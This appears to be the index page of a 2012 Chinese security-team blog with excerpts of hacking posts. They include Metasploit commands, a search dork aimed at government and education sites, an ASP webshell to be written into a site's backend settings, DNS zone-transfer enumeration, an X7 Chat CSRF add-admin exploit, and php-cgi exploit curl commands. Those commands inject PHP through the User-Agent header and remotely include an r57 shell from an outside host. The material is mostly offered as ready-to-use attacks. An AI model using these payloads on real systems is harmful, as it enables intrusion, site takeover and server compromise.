安全团队导航 – 关注WEB安全成就IT精英

metasploit常用渗透命令

2012-05-16

svn update 升级./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示选项
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
set PAYLOAD <payload name> 设置装置
show options 显示选项
set <OPTION NAME> <option> 设置选项
Read More »

作者：帅气凌云 | 分类目录：≮安全团队≯ | 标签：

没有评论
ad政府教育网站漏洞oday

2012-05-15

inurl:printpage.asp?ArticleID=

在后台版权信息栏里写入小马
if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Read More »

作者：帅气凌云 | 分类目录：≮程序漏洞≯ | 标签：

没有评论
DNS域传送漏洞利用及修复

2012-05-15

其实利用方法分为手工和工具两种，我们可以利用BT5下面的工具Dnsenum或者是其它工具，手工的话就利用nslookup即可。

1、使用工具来获取DNS信息

cd /pentest/enumeration/dns/dnsenum

# ./dnsenum.pl –enum domain.com

这样就可以简单的利用了。

2、使用手工的方法，推荐。方法如下图

Read More »

作者：帅气凌云 | 分类目录：≮安全运维≯ | 标签：

没有评论
X7 Chat 2.0.5.1及以下版本CSRF添加管理员缺陷及修复

2012-05-15

标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit

关键词: intitle:”Chat Room” “Powered By X7 Chat 2.0.5″

作者: DennSpec 下载地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip

影响版本: <= 2.0.5.1

首先注册获得一个用户名

(frame.html in path of your main html page)

Read More »

作者：帅气凌云 | 分类目录：≮程序漏洞≯ | 标签：

没有评论
php-cgi漏洞利用EXP

2012-05-15

1、本地包含直接执行代码:

curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt

作者：帅气凌云 | 分类目录：≮程序漏洞≯ | 标签：

没有评论

metasploit常用渗透命令

ad政府教育网站漏洞oday

DNS域传送漏洞利用及修复

X7 Chat 2.0.5.1及以下版本CSRF添加管理员缺陷及修复

php-cgi漏洞利用EXP

说明:

分类目录

最新公开漏洞

近期文章

友情链接

链接交换